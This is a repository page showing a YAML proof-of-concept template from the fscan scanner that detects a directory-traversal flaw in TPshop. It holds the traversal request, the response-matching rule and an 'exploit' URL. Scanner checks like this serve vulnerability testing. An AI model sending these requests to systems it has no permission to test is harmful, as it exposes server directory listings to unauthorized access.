qwqdanchun
/
fscan
mirror of https://github.com/qwqdanchun/fscan.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
fscan/Web_Scan/pocs/tpshop-directory-traversal.yml

18 lines
627 B
YAML
Raw Blame History

name: poc-yaml-tpshop-directory-traversal
rules:
- method: GET
path: /index.php/Home/uploadify/fileList?type=.+&path=../
headers:
Accept-Encoding: 'deflate'
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(string("\"state\":\"SUCCESS\""))) && response.body.bcontains(bytes(string("total")))
detail:
author: 清风明月(www.secbook.info)
influence_version: 'TPshop'
links:
- https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
- http://www.tp-shop.cn
exploit:
- https://localhost/index.php/Home/uploadify/fileList?type=.+&path=../../
Reference in New Issue View Git Blame Copy Permalink